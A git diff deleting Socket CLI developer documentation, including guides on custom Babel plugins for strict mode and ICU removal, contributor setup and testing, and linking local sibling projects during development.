TypeScript 
best practice for modern codebases - -**Trade-off**: More verbose code with optional chaining and checks - -### Vitest: isolate: false - -**Decision**: Disabled by default - -**Rationale**: -- Significant performance improvement (2-3x faster) -- Required for nock HTTP mocking to work -- Required for vi.mock() module mocking -- Test pollution prevented by proper beforeEach/afterEach -- Socket projects have well-designed tests with cleanup - -**Trade-off**: Shared worker context across tests (acceptable with good practices) - -### ESLint: Type-Aware Linting Disabled - -**Decision**: project: null in parserOptions - -**Rationale**: -- Type-aware linting causes performance issues on large codebases -- Can hang for minutes on full monorepo checks -- Most type errors caught by TypeScript compiler anyway -- Linting should be fast, type checking should be separate - -**Trade-off**: Some rules like @typescript-eslint/return-await won't work - -### Single ESLint Config - -**Decision**: One root config, not per-package - -**Rationale**: -- ESLint flat config works across entire monorepo naturally -- Reduces duplication significantly -- Easier to maintain consistency -- Packages rarely need custom rules - -**Trade-off**: Packages can't easily override rules (but this is rarely needed) - -## Benefits - -1. **Reduced Duplication**: 100+ lines of config per package → 5-10 lines -2. **Easier Onboarding**: New packages start with proven configs -3. **Consistency**: All packages use same base settings -4. **Faster Updates**: Change config once, applies everywhere -5. **Better Defaults**: Settings chosen based on Socket experience -6. **Documentation**: Centralized documentation for all configs - -## Future Enhancements - -Potential improvements to the architecture: - -1. **Shared Scripts**: Extract common build scripts to `.config/scripts/` -2. **TypeScript Project References**: Enable composite builds for faster incremental compilation -3. 
**Shared Test Utilities**: Move test helpers to a shared package -4. **Shared Constants**: Extract build constants used across packages -5. **Config Validation**: Script to verify all packages extend base configs correctly - -## Related Documentation - -- [Configuration Migration Guide](./configuration-migration.md) - How to migrate packages -- [.config/README.md](../.config/README.md) - Usage examples and reference -- [CI Testing](./ci-testing.md) - CI/CD integration -- [Testing Best Practices](./testing-best-practices.md) - Test writing guidelines diff --git a/docs/development/babel-plugins.md b/docs/development/babel-plugins.md deleted file mode 100644 index ad2ea9ec8..000000000 --- a/docs/development/babel-plugins.md +++ /dev/null @@ -1,519 +0,0 @@ -# Socket CLI Babel Plugins - -This document explains the custom Babel plugins used to transform Socket CLI code during the build process. - -## Overview - -Socket CLI uses custom Babel plugins to ensure code compatibility and enable size optimizations: - -1. **`babel-plugin-strict-mode.mjs`** - Transforms loose-mode code to strict-mode -2. **`babel-plugin-remove-icu.mjs`** - Removes ICU dependencies (optional) - -## Strict Mode Plugin - -### Purpose - -Ensures all code runs correctly in strict mode by transforming problematic patterns that are allowed in loose mode but forbidden in strict mode. - -### Location - -`scripts/babel/babel-plugin-strict-mode.mjs` - -### Transformations - -#### 1. Octal Numeric Literals - -Legacy octal literals (starting with `0`) are converted to decimal equivalents. - -**Before:** -```javascript -var x = 0123 // Octal literal (83 in decimal) -var y = 0755 // Octal literal (493 in decimal) -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal 0123 → 83 */ -var x = 83 -/* Strict-mode: Transformed octal 0755 → 493 */ -var y = 493 -``` - -#### 2. 
Octal Escape Sequences in Strings - -Octal escape sequences in strings are converted to proper escape sequences or hex escapes. - -**Before:** -```javascript -var str1 = 'Hello\012World' // \012 = newline -var str2 = 'Tab\011here' // \011 = tab -var str3 = '\033[31mRed\033[0m' // \033 = ESC -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal escapes */ -var str1 = 'Hello\nWorld' -/* Strict-mode: Transformed octal escapes */ -var str2 = 'Tab\there' -/* Strict-mode: Transformed octal escapes */ -var str3 = '\x1b[31mRed\x1b[0m' -``` - -**Common Octal Escape Mappings:** -- `\10` → `\b` (backspace) -- `\11` → `\t` (tab) -- `\12` → `\n` (line feed) -- `\13` → `\v` (vertical tab) -- `\14` → `\f` (form feed) -- `\15` → `\r` (carriage return) -- `\16`-`\377` → `\xNN` (hex escape) - -#### 3. Template Literals - -Octal escapes in template literals are also transformed: - -**Before:** -```javascript -const msg = `Line1\012Line2` -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal escapes in template */ -const msg = `Line1\nLine2` -``` - -#### 4. With Statements - -`with` statements cannot be safely transformed, so the plugin throws a compilation error: - -**Before:** -```javascript -with (obj) { - x = 1 -} -``` - -**After:** -``` -ERROR: "with" statement is not allowed in strict mode and cannot be safely transformed. -Please refactor your code to avoid using "with" statements. -``` - -#### 5. 
'use strict' Directive - -Automatically adds `'use strict'` directive to files that don't have it: - -**Before:** -```javascript -function foo() { - return 42 -} -``` - -**After:** -```javascript -'use strict' - -function foo() { - return 42 -} -``` - -### Statistics - -The plugin tracks and reports transformations: - -```javascript -/* -Strict Mode Transformation Stats: - - Octal literals converted: 5 - - Octal escapes transformed: 12 - - With statements found: 0 - - Strict directives added: 1 - Total transformations: 18 -*/ -``` - -### Always Enabled - -This plugin is **always enabled** in Socket CLI builds. It ensures compatibility and catches potential issues early. - ---- - -## ICU Removal Plugin - -### Purpose - -Transforms ICU-dependent code into ICU-free alternatives, allowing Node.js to be built with `--without-intl` to save ~8-10MB. - -### Location - -`scripts/babel/babel-plugin-remove-icu.mjs` - -### Status - -**Disabled by default** - Only enable if building with `--without-intl` Node.js. - -### Transformations - -#### 1. Number Formatting - -Transforms `.toLocaleString()` calls to simple comma-separated formatting: - -**Before:** -```javascript -const count = 1234567 -console.log(`Found ${count.toLocaleString()} vulnerabilities`) -``` - -**After:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -/* ICU-free: Transformed toLocaleString() → __formatNumber() */ -console.log(`Found ${__formatNumber(count)} vulnerabilities`) -// Output: "Found 1,234,567 vulnerabilities" -``` - -#### 2. 
Date Formatting - -Transforms date formatting methods to ISO format: - -**Before:** -```javascript -const date = new Date() -console.log(`Scanned at ${date.toLocaleDateString()}`) -console.log(`Time: ${date.toLocaleTimeString()}`) -``` - -**After:** -```javascript -function __formatDate(date) { - return date.toISOString().split('T')[0] -} - -/* ICU-free: Transformed toLocaleDateString() → __formatDate() */ -console.log(`Scanned at ${__formatDate(date)}`) -// Output: "Scanned at 2025-10-07" - -/* ICU-free: Transformed toLocaleTimeString() → ISO time */ -console.log(`Time: ${date.toISOString().split('T')[1]}`) -``` - -#### 3. String Comparison - -Transforms `.localeCompare()` to basic string comparison: - -**Before:** -```javascript -packages.sort((a, b) => a.name.localeCompare(b.name)) -``` - -**After:** -```javascript -function __simpleCompare(a, b) { - return a < b ? -1 : a > b ? 1 : 0 -} - -/* ICU-free: Transformed localeCompare() → __simpleCompare() */ -packages.sort((a, b) => __simpleCompare(a.name, b.name)) -``` - -⚠️ **Note:** This uses byte comparison, not locale-aware sorting. `'ä'` may not sort correctly with non-ASCII characters. - -#### 4. 
Intl.* APIs - -Transforms `Intl.*` APIs to simple wrappers: - -**Before:** -```javascript -const formatter = new Intl.NumberFormat() -console.log(formatter.format(1234567)) - -const dateFormatter = new Intl.DateTimeFormat() -console.log(dateFormatter.format(new Date())) -``` - -**After:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -/* WARNING: Intl.NumberFormat removed - using basic number formatting */ -const formatter = { - format(num) { - return __formatNumber(num) - } -} -console.log(formatter.format(1234567)) -// Output: "1,234,567" - -/* WARNING: Intl.DateTimeFormat removed - using basic date formatting */ -const dateFormatter = { - format(date) { - return date.toISOString() - } -} -console.log(dateFormatter.format(new Date())) -// Output: "2025-10-07T11:30:00.000Z" -``` - -#### 5. Unicode Regular Expressions - -Transforms Unicode property escapes to character classes: - -**Before:** -```javascript -const letterRegex = /\p{Letter}/u -const digitRegex = /\p{Number}/u -const spaceRegex = /\p{White_Space}/u -``` - -**After:** -```javascript -/* ICU-free: Transformed unicode regex → character class */ -const letterRegex = /[a-zA-Z]/ -/* ICU-free: Transformed unicode regex → character class */ -const digitRegex = /[0-9]/ -/* ICU-free: Transformed unicode regex → character class */ -const spaceRegex = /\s/ -``` - -**Supported Transformations:** -- `\p{Letter}`, `\p{L}`, `\p{Alphabetic}` → `[a-zA-Z]` -- `\p{Number}`, `\p{N}`, `\p{Digit}`, `\p{Nd}` → `[0-9]` -- `\p{Space}`, `\p{White_Space}` → `\s` -- `\p{ASCII}` → `[\x00-\x7F]` - -⚠️ **Complex patterns not supported:** -```javascript -/\p{Script=Greek}/u // ❌ Will add warning comment -// WARNING: Complex unicode regex may not work without ICU! 
-``` - -### Statistics - -The plugin tracks and reports transformations: - -```javascript -/* -ICU Removal Stats: - - toLocaleString() calls: 8 - - toLocaleDateString() calls: 3 - - toLocaleTimeString() calls: 2 - - localeCompare() calls: 12 - - Intl.* API usage: 5 - - Unicode regex patterns: 7 - Total transformations: 37 -*/ -``` - -### Limitations - -When ICU is removed, the following features are lost: - -❌ **No real locale support** (only English-style formatting) -❌ **No timezone support** beyond UTC -❌ **No currency formatting** (`Intl.NumberFormat` with `style: 'currency'`) -❌ **No plural rules** (`Intl.PluralRules`) -❌ **No locale-aware sorting** (simple byte comparison only) -❌ **No date/time localization** (ISO format only) -❌ **Limited Unicode regex** (only basic character classes) - -### When to Enable - -Enable this plugin only if: - -✅ Building pkg binaries where every MB matters -✅ English-only CLI tool (no internationalization needed) -✅ Willing to trade locale support for ~8-10MB size reduction -✅ Ready to test all CLI output thoroughly - -### How to Enable - -#### Step 1: Enable the Babel Plugin - -Edit `.config/babel.config.js`: - -```javascript -module.exports = { - presets: ['@babel/preset-react', '@babel/preset-typescript'], - plugins: [ - // ... other plugins ... 
- path.join(babelPluginsPath, 'babel-plugin-strict-mode.mjs'), - path.join(babelPluginsPath, 'babel-plugin-inline-require-calls.js'), - path.join(babelPluginsPath, 'transform-set-proto-plugin.mjs'), - path.join(babelPluginsPath, 'transform-url-parse-plugin.mjs'), - // Uncomment to enable ICU removal: - path.join(babelPluginsPath, 'babel-plugin-remove-icu.mjs'), // ← Uncomment this line - ], -} -``` - -#### Step 2: Rebuild Node.js WITHOUT ICU - -Edit `scripts/build-yao-pkg-node.sh` and change configure options: - -```bash -./configure \ - --without-intl \ # ← Change from --with-intl=small-icu - --without-npm \ - --without-corepack \ - --without-inspector \ - --without-amaro \ - --without-sqlite -``` - -Then rebuild: - -```bash -cd .custom-node-build/node-yao-pkg -git reset --hard v24.9.0 -git clean -fdx -patch -p1 < ../patches/node.v24.9.0.cpp.patch -./configure --without-intl --without-npm --without-corepack --without-inspector --without-amaro --without-sqlite -make -j$(sysctl -n hw.ncpu) -``` - -#### Step 3: Rebuild Socket CLI - -```bash -cd $(pwd) -pnpm run build:cli -``` - -#### Step 4: Test Thoroughly - -Test all CLI functionality: - -```bash -# Test help output -pnpm exec socket --help -pnpm exec socket scan --help - -# Test number formatting (package counts, file sizes) -pnpm exec socket info some-package - -# Test date display -pnpm exec socket scan . - -# Run unit tests -pnpm run test:unit -``` - -### Size Impact - -| Configuration | Node.js Binary Size | ICU Plugin | Impact | -|---------------|-------------------|-----------|---------| -| Current | 82.7 MB | Disabled | Baseline | -| With ICU removal | ~74-76 MB | Enabled | **-8-10 MB** | - -**Note:** The actual size reduction comes from building Node.js with `--without-intl`. The Babel plugin just makes the code work without ICU. - ---- - -## Plugin Execution Order - -Plugins run in this order (defined in `.config/babel.config.js`): - -1. `@babel/preset-typescript` (preset) -2. 
`@babel/preset-react` (preset) -3. `@babel/plugin-proposal-export-default-from` -4. `@babel/plugin-transform-export-namespace-from` -5. `@babel/plugin-transform-runtime` -6. **`babel-plugin-strict-mode.mjs`** ⭐ (fixes loose-mode code first) -7. `babel-plugin-inline-require-calls.js` -8. `transform-set-proto-plugin.mjs` -9. `transform-url-parse-plugin.mjs` -10. `babel-plugin-remove-icu.mjs` (disabled by default, runs last if enabled) - -**Why this order?** -- Strict-mode transformations run early to fix fundamental issues -- ICU removal runs last to transform final API calls - ---- - -## Development - -### Testing Plugins - -To see the transformed output: - -```bash -# Build with transformations -pnpm run build:cli - -# Check transformed code -cat dist/cli.js | head -200 - -# Look for plugin comments -grep -n "Strict-mode:" dist/*.js -grep -n "ICU-free:" dist/*.js -``` - -### Adding a New Plugin - -1. Create file in `scripts/babel/` with `.mjs` extension -2. Add `@fileoverview` header -3. Export default function returning Babel plugin -4. Add to `.config/babel.config.js` -5. Test with `pnpm run build:cli` - -See `scripts/babel/README.md` for detailed instructions. - ---- - -## Related Documentation - -- [Babel Plugin Development Guide](../scripts/babel/README.md) -- [yao-pkg Build Documentation](./YAO_PKG_BUILD.md) -- [Node.js ICU Documentation](https://nodejs.org/api/intl.html) -- [Babel Plugin Handbook](https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md) - ---- - -## Troubleshooting - -### Plugin Not Running - -If transformations aren't being applied: - -1. Check plugin is uncommented in `.config/babel.config.js` -2. Rebuild: `pnpm run build:cli` -3. 
Check for Babel errors: `pnpm run build:cli 2>&1 | grep -i error` - -### ICU Plugin Enabled But Code Still Works - -If you enabled the ICU plugin but code using `Intl.*` still works: - -- Node.js may still have ICU enabled (`--with-intl=small-icu`) -- Rebuild Node.js with `--without-intl` (see Step 2 above) -- Verify with: `PKG_EXECPATH=PKG_INVOKE_NODEJS ./out/Release/node -e "console.log(typeof Intl)"` - - Should output: `undefined` - -### Tests Failing After Enabling ICU Removal - -Some tests may fail because they expect real locale support: - -1. Update test expectations for ICU-free output -2. Mock `Intl.*` APIs in tests if needed -3. Check test snapshots: `pnpm run test:unit:update` - ---- - -## Summary - -Socket CLI uses custom Babel plugins to: - -1. **Ensure strict-mode compatibility** (always enabled) -2. **Optionally remove ICU dependencies** for ~8-10MB size savings - -The strict-mode plugin is production-ready and always enabled. The ICU removal plugin is optional and should only be enabled when building size-optimized pkg binaries with custom Node.js builds. diff --git a/docs/development/getting-started.md b/docs/development/getting-started.md deleted file mode 100644 index f74d8b835..000000000 --- a/docs/development/getting-started.md +++ /dev/null @@ -1,570 +0,0 @@ -# Getting Started with Socket CLI Development - -Complete end-to-end guide for new contributors to Socket CLI. 
- -## Prerequisites - -Before starting, ensure you have: - -| Requirement | Minimum Version | Check Command | -|-------------|----------------|---------------| -| Node.js | 18.0.0+ | `node --version` | -| pnpm | 10.16.0+ | `pnpm --version` | -| Git | 2.0+ | `git --version` | -| Disk Space | ~5 GB | `df -h .` | - -### Installing Prerequisites - -**Node.js 18+:** -```bash -# macOS (using Homebrew) -brew install node@20 - -# Linux (using nvm) -curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.0/install.sh | bash -nvm install 20 - -# Windows (using Chocolatey) -choco install nodejs-lts -``` - -**pnpm 10.16+:** -```bash -# Using npm (comes with Node.js) -npm install -g pnpm - -# Or using Homebrew (macOS) -brew install pnpm - -# Or use corepack (built into Node.js 16+) -corepack enable -corepack prepare pnpm@latest --activate - -# Verify installation -pnpm --version # Should be 10.16.0 or higher -``` - -## Quick Start (5 Minutes) - -Get Socket CLI running locally in 5 steps: - -```bash -# 1. Clone the repository -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# 2. Install dependencies -pnpm install - -# 3. Build the CLI -pnpm run build - -# 4. Test the CLI -pnpm exec socket --version - -# 5. Run tests -pnpm run test:unit -``` - -**Expected output:** -``` -$ pnpm exec socket --version -CLI: v1.2.0 -``` - -If you see the version number, congratulations! Your setup is working. - -**Note:** You may see a banner with token/org info - this is normal and comes from your local config. Most commands work without an API token during development. - -## Detailed Setup - -### Step 1: Clone the Repository - -```bash -# Clone from GitHub -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# Or if you have SSH keys configured -git clone git@github.com:SocketDev/socket-cli.git -cd socket-cli -``` - -**Verification:** -```bash -ls -la -# Should see: package.json, packages/, docs/, etc. 
-``` - -### Step 2: Install Dependencies - -```bash -pnpm install -``` - -**What this does:** -- Installs all npm dependencies -- Sets up pnpm workspace for the monorepo -- Links internal packages together -- Downloads Socket registry overrides - -**Expected output:** -``` -Packages: +500 -++++++++++++++++++++++++++++++++ -Progress: resolved 500, reused 500, downloaded 0, added 500, done -``` - -**Verification:** -```bash -ls -la node_modules -# Should see many packages installed -``` - -### Step 3: Build the CLI - -```bash -pnpm run build -``` - -**What this does:** -- Compiles TypeScript source files to JavaScript -- Generates type definitions -- Creates the `dist/` directory with built files -- Takes ~30 seconds - -**Expected output:** -``` -> socket-cli@1.0.80 build -> pnpm run build:cli - -✓ TypeScript compilation complete -✓ Type definitions generated -✓ Build artifacts created in dist/ -``` - -**Verification:** -```bash -ls -la packages/cli/dist -# Should see: cli.js and other compiled files -``` - -### Step 4: Run the CLI Locally - -```bash -# Run using pnpm exec (recommended) -pnpm exec socket --version -``` - -**Try some commands:** -```bash -# Show help -pnpm exec socket --help - -# These work without API token -pnpm exec socket --version -pnpm exec socket --help-full - -# Commands that require API token -pnpm exec socket package lodash --view -pnpm exec socket scan create -``` - -### Step 5: Run Tests - -```bash -# Run all tests (lint, type-check, unit tests) -pnpm run test - -# Or run just unit tests (from CLI package) -pnpm --filter @socketsecurity/cli run test:unit - -# Or run specific test file -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -``` - -**Expected output:** -``` -✓ packages/cli/src/commands/scan/cmd-scan.test.mts (10 tests) 234ms -✓ packages/cli/src/utils/config.test.mts (15 tests) 156ms - -Test Files 2 passed (2) -Tests 25 passed (25) -``` - -**Verification:** -```bash -echo $? 
-# Should output: 0 (success) -``` - -## Development Workflow - -### Making Changes - -1. **Create a feature branch:** - ```bash - git checkout -b feature/my-awesome-feature - ``` - -2. **Make your changes:** - - Edit files in `packages/cli/src/` - - Follow the code style in `CLAUDE.md` - - Use `.mts` extension for TypeScript files - -3. **Build and test:** - ```bash - pnpm run build - pnpm run test:unit - ``` - -4. **Test your changes:** - ```bash - # Run the CLI with your changes - pnpm exec socket - - # Or use the quick build + run script - pnpm run bs - ``` - -### Common Development Tasks - -**Build the CLI:** -```bash -pnpm run build -``` - -**Run the CLI:** -```bash -# After building -pnpm exec socket --help -pnpm exec socket --version - -# Test basic commands (no API token required) -pnpm exec socket --version -pnpm exec socket --help -``` - -**Run tests:** -```bash -# All tests (includes build step) -pnpm run test - -# Just unit tests -pnpm --filter @socketsecurity/cli run test:unit - -# Specific test file -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -``` - -**Fix linting issues:** -```bash -pnpm run fix -``` - -**Type checking:** -```bash -pnpm run type -``` - -**Update test snapshots:** -```bash -# Update all snapshots -pnpm run testu - -# Update specific test file -pnpm run testu packages/cli/src/commands/scan/cmd-scan.test.mts -``` - -### Testing Strategies - -**Test a single file (fast):** -```bash -pnpm --filter @socketsecurity/cli run test:unit src/utils/config.test.mts -``` - -**Test with pattern matching:** -```bash -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -t "should handle errors" -``` - -**Test with coverage:** -```bash -pnpm --filter @socketsecurity/cli run test:unit:coverage -``` - -**Watch mode (auto-rerun on changes):** -```bash -pnpm --filter @socketsecurity/cli run test:unit -- --watch -``` - -## Project Structure - -Understanding the codebase organization: 
- -``` -socket-cli/ -├── packages/cli/ # Main CLI package -│ ├── src/ -│ │ ├── cli.mts # Entry point -│ │ ├── commands/ # Command implementations -│ │ │ ├── scan/ # Scan command -│ │ │ │ ├── cmd-scan.mts # Command definition -│ │ │ │ ├── handle-scan.mts # Business logic -│ │ │ │ └── output-scan.mts # Output formatting -│ │ │ ├── optimize/ # Optimize command -│ │ │ └── ... # Other commands -│ │ ├── utils/ # Shared utilities -│ │ ├── types.mts # Type definitions -│ │ └── constants.mts # Constants -│ ├── dist/ # Build output (gitignored) -│ └── test/ # Test files -├── packages/yoga-layout/ # WASM builder for Yoga -├── packages/onnx-runtime-builder/ # ONNX Runtime WASM -├── packages/minilm-builder/ # ML model builder -├── packages/node-smol-builder/ # Custom Node.js builder -├── packages/node-sea-builder/ # SEA binary builder -├── docs/ # Documentation -│ ├── architecture/ # System design -│ ├── build/ # Build guides -│ ├── development/ # Developer guides -│ └── testing/ # Testing strategies -└── scripts/ # Build and utility scripts -``` - -### Command Architecture Pattern - -Each command follows this pattern: -- `cmd-*.mts` - Command definition and CLI interface (meow flags, help text) -- `handle-*.mts` - Business logic and processing -- `output-*.mts` - Output formatting (JSON, markdown, etc.) -- `fetch-*.mts` - API calls (when applicable) - -**Example: Scan command** -``` -commands/scan/ -├── cmd-scan.mts # CLI interface, flags -├── handle-scan.mts # Processing logic -├── output-scan.mts # Format results -└── fetch-scan.mts # API interactions -``` - -## Building Advanced Components - -Socket CLI includes several advanced build components. 
You typically don't need to build these for CLI development, but here's how: - -### Building WASM Components - -```bash -# Build all WASM components -node scripts/build-all-binaries.mjs --wasm-only - -# Or build individually -cd packages/yoga-layout -pnpm run build -``` - -**Requirements:** -- Emscripten SDK (for yoga-layout) -- Rust + wasm-pack (for ONNX, models) - -See: [Build Toolchain Setup](../build/build-toolchain-setup.md) - -### Building Custom Node.js - -```bash -# Build custom Node.js for current platform -node scripts/build-all-binaries.mjs --smol-only -``` - -**Requirements:** -- Python 3.8+ -- C++ compiler (GCC, Clang, or MSVC) -- ~10 GB disk space -- ~30 minutes build time - -See: [Build Quick Start](../build/build-quick-start.md) - -## Linking to Local Dependencies - -For developing with local versions of Socket dependencies: - -```bash -# Link to local socket-registry and socket-sdk-js -node scripts/setup-links.mjs - -# This enables hot-reloading from sibling repositories -``` - -See: [Development Linking](./linking.md) - -## Troubleshooting - -### Issue: Banner shows "token: iToke*** (config)" - -This is **normal** - Socket CLI reads your local config file (`.socketrc.json` or environment variables). 
Most commands work without an API token during development: - -```bash -# These work without API token -pnpm exec socket --version -pnpm exec socket --help - -# These require API token -pnpm exec socket package lodash --view -pnpm exec socket scan create -``` - -To suppress config, use `--config '{}'`: -```bash -pnpm exec socket --config '{}' --version -``` - -### Issue: "pnpm: command not found" - -```bash -# Install pnpm globally -npm install -g pnpm - -# Or use corepack (built into Node.js 16+) -corepack enable -corepack prepare pnpm@latest --activate -``` - -### Issue: "Cannot find module" errors - -```bash -# Clean and reinstall dependencies -rm -rf node_modules packages/*/node_modules -pnpm install -pnpm run build -``` - -### Issue: Tests failing - -```bash -# Ensure you built first -pnpm run build - -# Run specific failing test for debugging -pnpm test:unit -t "test name" - -# Check if snapshots need updating -pnpm run testu -``` - -### Issue: "Out of memory" during build - -```bash -# Increase Node.js memory limit -export NODE_OPTIONS="--max-old-space-size=4096" -pnpm run build -``` - -### Issue: TypeScript errors - -```bash -# Rebuild the project -pnpm run build - -# Run type checker -pnpm run type -``` - -### Issue: Build is very slow - -```bash -# Clean and rebuild -pnpm run clean -pnpm run build - -# Or build just what you need -pnpm --filter @socketsecurity/cli run build -``` - -### Issue: Can't run CLI after build - -```bash -# Check that build succeeded -ls -la packages/cli/dist/cli.js - -# Try running directly -node packages/cli/dist/cli.js --version - -# Check Node version -node --version # Should be 20+ -``` - -### Issue: Git hooks failing on commit - -```bash -# Fix linting issues first -pnpm run fix - -# Or bypass hooks temporarily (not recommended) -git commit --no-verify -``` - -## Next Steps - -Now that you have Socket CLI running locally: - -1. 
**Read the architecture docs:** - - [Repository Structure](../architecture/repository.md) - - [Bootstrap/Stub Architecture](../architecture/bootstrap-stub.md) - -2. **Learn the coding standards:** - - Read `CLAUDE.md` in the repository root - - Review existing commands for patterns - -3. **Pick an issue to work on:** - - Browse [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) - - Look for "good first issue" labels - -4. **Make your first contribution:** - - Create a feature branch - - Make your changes - - Write tests - - Submit a pull request - -## Getting Help - -If you encounter issues not covered here: - -1. Check existing documentation: - - [Build Quick Start](../build/build-quick-start.md) - - [Build Toolchain Setup](../build/build-toolchain-setup.md) - - [Testing Guide](../testing/local-testing.md) - -2. Search [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) - -3. Ask in [Socket Community Discord](https://socket.dev/discord) - -4. File a [Bug Report](https://github.com/SocketDev/socket-cli/issues/new) - -## Quick Command Reference - -| Task | Command | -|------|---------| -| Install dependencies | `pnpm install` | -| Build CLI | `pnpm run build` | -| Run CLI | `pnpm exec socket ` | -| Run all tests | `pnpm run test` | -| Run unit tests | `pnpm --filter @socketsecurity/cli run test:unit` | -| Fix linting | `pnpm run fix` | -| Type check | `pnpm run type` | -| Clean build artifacts | `pnpm run clean` | - -## Verification Checklist - -Before submitting your first PR, verify: - -- [ ] `pnpm install` completes successfully -- [ ] `pnpm run build` completes without errors -- [ ] `pnpm exec socket --version` shows version number -- [ ] `pnpm run test:unit` passes all tests -- [ ] `pnpm run type` passes without errors -- [ ] `pnpm run fix` fixes any linting issues -- [ ] Your code follows patterns in `CLAUDE.md` -- [ ] You've tested your changes locally - -Welcome to Socket CLI development! 
diff --git a/docs/development/linking.md b/docs/development/linking.md deleted file mode 100644 index 28de664c5..000000000 --- a/docs/development/linking.md +++ /dev/null @@ -1,184 +0,0 @@ -# Socket Project Linking for Development - -## Overview - -A simple system for linking Socket projects during local development: -- **Local development**: Uses filesystem links to sibling projects -- **CI/production**: Uses published npm packages - -The key: `.pnpmfile.cjs` files are **generated locally** and **gitignored**, so they never affect CI/production. - -## How It Works - -### For Developers - -```bash -# Enable local linking (clones dependencies if needed) -node scripts/setup-links.mjs - -# Use GitHub main branches -node scripts/setup-links.mjs main --all - -# Reset to published packages -node scripts/setup-links.mjs published --all -``` - -This generates `.pnpmfile.cjs` files that redirect dependencies: -- `local` → `link:../socket-registry/registry` -- `main` → `github:SocketDev/socket-registry#main` -- `published` → removes .pnpmfile.cjs (uses package.json) - -### For CI/Production - -**Nothing special needed!** - -Since `.pnpmfile.cjs` is gitignored: -- CI never sees these files -- `pnpm install` uses normal package.json dependencies -- Always gets stable, published packages from npm - -## What Can Be Linked - -| Project | Can Link To | -|---------|------------| -| socket-cli | @socketsecurity/registry, @socketsecurity/sdk | -| socket-sdk-js | @socketsecurity/registry | -| socket-packageurl-js | @socketsecurity/registry | - -## Developer Workflow - -### Initial Setup - -```bash -cd socket-cli - -# Setup local linking (auto-clones dependencies if needed) -node scripts/setup-links.mjs - -# This creates .pnpmfile.cjs (gitignored) and runs pnpm install -``` - -### Making Changes - -1. **Edit dependency code**: - ```bash - cd ../socket-registry/registry - # Make changes - pnpm build - ``` - -2. 
**Changes are immediately available** in linked projects (no publish needed) - -### Testing Different Versions - -```bash -# Test with local code -node scripts/setup-links.mjs local -pnpm test - -# Test with GitHub main branch -node scripts/setup-links.mjs main -pnpm test - -# Test with published packages (like CI) -node scripts/setup-links.mjs published -pnpm test -``` - -## How GitHub/CI Handles This - -### What Gets Committed - -✅ **Committed to repo:** -- `scripts/setup-links.mjs` - The setup tool -- `package.json` - Normal dependencies (unchanged) - -❌ **NOT committed (gitignored):** -- `.pnpmfile.cjs` - Local overrides -- `.env.local` - Local environment - -### CI Behavior - -```yaml -# In GitHub Actions -jobs: - test: - steps: - - uses: actions/checkout@v5 - - run: pnpm install # Uses package.json normally - # .pnpmfile.cjs doesn't exist, so no overrides applied -``` - -**Result:** CI always uses stable, published packages - -## Examples - -### Setup All Projects for Local Development - -```bash -node scripts/setup-links.mjs --all -``` - -### Work on socket-registry Changes - -```bash -# In socket-cli, link to local registry -node scripts/setup-links.mjs local - -# Make changes in registry -cd ../socket-registry/registry -vim src/lib/logger.ts -pnpm build - -# Changes immediately available in socket-cli -cd ../../socket-cli -pnpm test # Uses your local changes -``` - -### Test socket-cli with Local SDK - -```bash -# socket-cli can link both registry and SDK -node scripts/setup-links.mjs local socket-cli - -# This creates overrides for both: -# @socketsecurity/registry → ../socket-registry/registry -# @socketsecurity/sdk → ../socket-sdk-js -``` - -### Reset to Production Mode - -```bash -# Remove all overrides -node scripts/setup-links.mjs published --all - -# Now uses npm packages like production -``` - -## Benefits - -1. **Clean Repository**: No linking configuration in the repo -2. **CI Simplicity**: CI just runs `pnpm install` normally -3. 
**Developer Flexibility**: Easy switching between local/main/published -4. **Auto-Setup**: Clones missing dependencies automatically -5. **No Accidents**: Can't accidentally commit local paths - -## Troubleshooting - -### Changes Not Reflected -- Ensure dependency is built: `cd ../socket-registry/registry && pnpm build` -- Check .pnpmfile.cjs exists: `ls -la .pnpmfile.cjs` -- Re-run setup: `node scripts/setup-links.mjs local` - -### CI Issues -- CI should never see .pnpmfile.cjs (it's gitignored) -- If CI fails, ensure .pnpmfile.cjs is in .gitignore -- CI always uses published packages (no setup needed) - -### Missing Dependencies -- Script auto-clones from GitHub if not found locally -- Or manually clone: `git clone https://github.com/SocketDev/socket-registry.git ../socket-registry` - -## Key Principle - -**Development linking is a local-only concern.** The repository stays clean, and CI/production always uses stable, published packages. The `.pnpmfile.cjs` mechanism is invisible to anyone not actively developing locally. \ No newline at end of file diff --git a/docs/development/platform-support.md b/docs/development/platform-support.md deleted file mode 100644 index 2695699b7..000000000 --- a/docs/development/platform-support.md +++ /dev/null @@ -1,506 +0,0 @@ -# pkg Platform Support for Socket CLI - -## Overview - -Socket CLI pkg binaries are built for all major platforms and architectures, ensuring maximum compatibility across desktop environments, Docker containers, and cloud infrastructure. 
